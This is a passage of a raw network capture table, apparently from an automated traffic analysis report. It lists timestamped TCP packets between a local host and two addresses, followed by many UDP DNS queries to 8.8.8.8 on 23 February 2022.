                                              Feb 23, 2022 03:18:58.450632095 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:58.581794977 CET535024472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:18:59.263154030 CET5024453192.168.2.472.52.178.23
                                              Feb 23, 2022 03:18:59.394721031 CET535024472.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:02.396095037 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:02.396131039 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:03.025742054 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:03.025808096 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:03.560457945 CET5024857084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:03.560497046 CET5708450248192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:05.011569023 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:05.142196894 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:05.763787985 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:05.894387007 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:06.451615095 CET5027553192.168.2.472.52.178.23
                                              Feb 23, 2022 03:19:06.582133055 CET535027572.52.178.23192.168.2.4
                                              Feb 23, 2022 03:19:14.546950102 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:14.547003031 CET5708450313192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:15.061358929 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:15.061400890 CET5708450313192.168.2.1192.168.2.4
                                              Feb 23, 2022 03:19:15.561445951 CET5031357084192.168.2.4192.168.2.1
                                              Feb 23, 2022 03:19:15.561503887 CET5708450313192.168.2.1192.168.2.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Feb 23, 2022 03:17:15.146673918 CET6454953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:15.190376043 CET53645498.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:18.373079062 CET6315353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:18.373151064 CET5299153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:18.374259949 CET5370053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:18.405678034 CET53529918.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:18.410402060 CET53537008.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:18.418453932 CET53631538.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:18.570517063 CET5172653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:18.571837902 CET5679453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:18.589073896 CET53567948.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:18.604631901 CET53517268.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.165021896 CET5653453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.189239025 CET53565348.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.237468004 CET5662753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.237973928 CET5662153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.260190010 CET53566218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.260324001 CET53566278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.413949966 CET6311653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.415313959 CET6407853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.437530994 CET53640788.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.437691927 CET53631168.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:19.456554890 CET6480153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:19.480472088 CET53648018.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.147267103 CET6172153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.152009010 CET5125553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.154330015 CET6152253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.167193890 CET53617218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.172379971 CET53512558.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.175570011 CET53615228.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.631911039 CET5233753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.634460926 CET5504653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.636790991 CET4961253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:20.653959036 CET53496128.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.655827999 CET53523378.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:20.658639908 CET53550468.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:21.723042011 CET4928553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:21.727518082 CET5060153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:21.729856968 CET6087553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:21.744074106 CET53492858.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:21.748867035 CET53506018.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:21.750860929 CET53608758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:21.848233938 CET5644853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:21.876384974 CET53564488.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:22.172487020 CET5917253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:22.189280033 CET6242053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:22.197581053 CET53591728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:22.197910070 CET6057953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:22.210278034 CET53624208.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:22.233288050 CET53605798.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:25.690653086 CET5018353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:25.692627907 CET6153153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:25.693905115 CET4922853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:25.711375952 CET53501838.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:25.711786032 CET53615318.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:25.715965033 CET53492288.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:25.843719959 CET5979453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:25.846021891 CET5591653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:25.864566088 CET53597948.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:25.868746996 CET53559168.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.601308107 CET5275253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.604938030 CET6054253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.610349894 CET6068953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.620842934 CET53527528.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.626635075 CET53605428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.631983995 CET53606898.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.767477989 CET6420653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.767563105 CET5090453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.785408020 CET53509048.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.790127039 CET53642068.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.903903008 CET5752553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.909192085 CET5381453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.909389973 CET5341853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:26.923228025 CET53575258.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.929933071 CET53538148.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:26.930727959 CET53534188.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.126938105 CET6283353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.127670050 CET5926053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.146779060 CET53592608.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.148013115 CET53628338.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.188863993 CET4994453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.217617989 CET53499448.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.314085007 CET6330053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.315356970 CET6144953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.333156109 CET53633008.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.370673895 CET53614498.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.467791080 CET5127553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.470284939 CET6349253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.487061024 CET53512758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.494333982 CET53634928.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.529756069 CET5894553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.549221039 CET53589458.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:27.835242033 CET6077953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:27.854332924 CET53607798.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:28.428631067 CET6401453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:28.430250883 CET5709153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:28.430906057 CET5590453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:28.450372934 CET53640148.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:28.451889038 CET53559048.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:28.451932907 CET53570918.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:28.668838978 CET5210953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:28.700639963 CET53521098.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:30.108908892 CET5445053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:30.128712893 CET53544508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:30.925158978 CET4937453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:30.926697016 CET5043653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:30.927524090 CET6260553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:30.944658041 CET53493748.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:30.945703983 CET53504368.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:30.951234102 CET53626058.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:32.272149086 CET5425653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:32.274471045 CET5218953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:32.275552988 CET5613153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:32.291670084 CET53542568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:32.294214964 CET53561318.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:32.295481920 CET53521898.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:34.170439005 CET6299253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:34.191761017 CET53629928.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:34.832075119 CET5443253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:34.834609032 CET5722753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:34.835484028 CET5838353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:34.853797913 CET53544328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:34.856712103 CET53583838.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:34.870903015 CET53572278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:35.798913002 CET6313653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:35.820677042 CET53631368.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:37.451206923 CET5091153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:37.453051090 CET6340953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:37.472245932 CET53509118.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:37.473638058 CET53634098.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:38.141405106 CET5918553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:38.153063059 CET6423653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:38.155414104 CET5615753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:38.160873890 CET53591858.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:38.172950029 CET53642368.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:38.174994946 CET53561578.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:38.930455923 CET5560153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.047730923 CET53556018.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.185575962 CET5298453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.188510895 CET5114153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.189737082 CET5361053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.204482079 CET53529848.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.211095095 CET53536108.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.230983019 CET53511418.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.798258066 CET6124753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.800189972 CET6516553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.800718069 CET5207653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:39.819755077 CET53612478.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.821506023 CET53651658.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:39.821554899 CET53520768.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:44.253441095 CET5490353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:44.264261007 CET5504553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:44.267355919 CET5446453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:44.274151087 CET53549038.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:44.286362886 CET53544648.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:44.308341026 CET53550458.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:46.193627119 CET5097053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:46.195482969 CET5526153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:46.196245909 CET5980953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:46.214873075 CET53509708.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:46.215300083 CET53598098.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:46.238414049 CET53552618.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:47.249001026 CET5127853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:47.270626068 CET53512788.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:47.281189919 CET5193253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:47.282283068 CET5949453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:47.301078081 CET53594948.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:47.302572012 CET53519328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:47.936031103 CET5591553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:47.956876040 CET53559158.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:48.725636959 CET4977953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:48.729209900 CET4945853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:48.731369972 CET5716453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:48.744659901 CET53497798.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:48.747980118 CET53494588.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:48.752985954 CET53571648.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:49.842408895 CET4984053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:49.843561888 CET5717453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:49.844214916 CET5853153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:49.864274979 CET53571748.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:49.864507914 CET53585318.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:49.866245985 CET53498408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:50.080027103 CET4960853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:50.110178947 CET53496088.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:50.561095953 CET5568253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:50.579612970 CET53556828.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:50.594013929 CET6243653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:50.594844103 CET6123053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:50.613616943 CET53612308.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:50.613877058 CET53624368.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:52.410819054 CET6473053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:52.431597948 CET53647308.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:52.722417116 CET6062453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:52.724116087 CET6260053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:52.742633104 CET53606248.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:52.744779110 CET53626008.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:54.595674992 CET6103453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:54.598393917 CET5768753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:54.601253033 CET4983953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:54.616224051 CET53610348.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:54.617105961 CET53576878.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:54.622185946 CET53498398.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:55.744277954 CET5797553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:55.765160084 CET53579758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:55.784830093 CET5761053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:55.787615061 CET5513753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:55.806126118 CET53576108.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:55.808655024 CET53551378.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:56.753768921 CET5921653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:56.757359028 CET6349553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:56.774558067 CET53592168.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:56.775353909 CET53634958.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:56.819638968 CET6437153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:56.840543985 CET53643718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:57.124361992 CET5403753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:57.144934893 CET53540378.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:57.842695951 CET5348153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:57.844325066 CET5831353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:57.863147020 CET53534818.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:57.864445925 CET53583138.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:58.385004997 CET5895053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:58.386249065 CET5501153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:58.386892080 CET5719853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:17:58.403441906 CET53589508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:58.404800892 CET53550118.8.8.8192.168.2.4
                                              Feb 23, 2022 03:17:58.405155897 CET53571988.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.141848087 CET6087553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.160676956 CET5513453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.162467003 CET53608758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.163531065 CET5369553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:00.181740999 CET53551348.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:00.182641029 CET53536958.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:03.827583075 CET5097553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:03.849165916 CET53509758.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:04.099941969 CET6546053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:04.117537022 CET53654608.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:04.414279938 CET6366953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:04.435612917 CET53636698.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.037002087 CET5165353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.038283110 CET5647353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.039335966 CET6145453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:05.058576107 CET53516538.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.059412003 CET53564738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:05.060012102 CET53614548.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.017699957 CET5432353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.037640095 CET53543238.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.550318956 CET5996053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.571711063 CET53599608.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:06.593893051 CET5020553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:06.615320921 CET53502058.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:07.399161100 CET5089653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:07.420618057 CET53508968.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:07.498773098 CET5915153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:07.519898891 CET53591518.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.242543936 CET5616353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.245345116 CET5718653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.246047020 CET6112553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.261521101 CET53561638.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.266479969 CET53571868.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.266515970 CET53611258.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.918097973 CET6122753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.921276093 CET5467653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:09.939625025 CET53612278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:09.941704035 CET53546768.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:10.037482023 CET6503053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:10.057305098 CET53650308.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.689815044 CET6174053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.693098068 CET5970853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.714039087 CET53597088.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.725672007 CET5404453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.731580019 CET53617408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.747415066 CET53540448.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:11.748645067 CET5693253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:11.767764091 CET53569328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.471340895 CET5781753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.492397070 CET53578178.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.551088095 CET5955653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.552077055 CET5754053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:12.570761919 CET53575408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:12.572078943 CET53595568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.392081976 CET6233753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.393547058 CET5755053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.394527912 CET6352353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:13.413957119 CET53623378.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.414499044 CET53575508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:13.415365934 CET53635238.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.496077061 CET5950153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.518726110 CET6003353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.521399021 CET6214253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:14.538268089 CET53595018.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.539995909 CET53600338.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:14.542396069 CET53621428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.163290977 CET5470553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.164768934 CET5476953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.165318966 CET6008253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:15.184832096 CET53547058.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.186371088 CET53547698.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:15.186562061 CET53600828.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.126071930 CET6024053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.147473097 CET53602408.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.194529057 CET5953253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.195451975 CET5093153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:17.215998888 CET53595328.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:17.216214895 CET53509318.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:20.154019117 CET5656753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:20.171061993 CET53565678.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:22.863518953 CET5951053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:22.864291906 CET6279353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:22.884829044 CET53595108.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:22.884872913 CET53627938.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:25.210112095 CET5109053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:25.229743004 CET53510908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.736507893 CET5752753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.757709980 CET53575278.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.804306984 CET5589053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.805155993 CET5104253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:26.823673010 CET53510428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:26.825092077 CET53558908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.193944931 CET4937353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.223310947 CET53493738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.833328009 CET5238753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.836766958 CET5025853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:28.852556944 CET53523878.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:28.855278015 CET53502588.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:30.769023895 CET5279253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:30.772142887 CET5491753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:30.789793968 CET53527928.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:30.793885946 CET53549178.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:32.875988960 CET6506453192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:32.922066927 CET53650648.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:35.259838104 CET4990253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.260540009 CET5899653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.279433012 CET53499028.8.8.8192.168.2.4
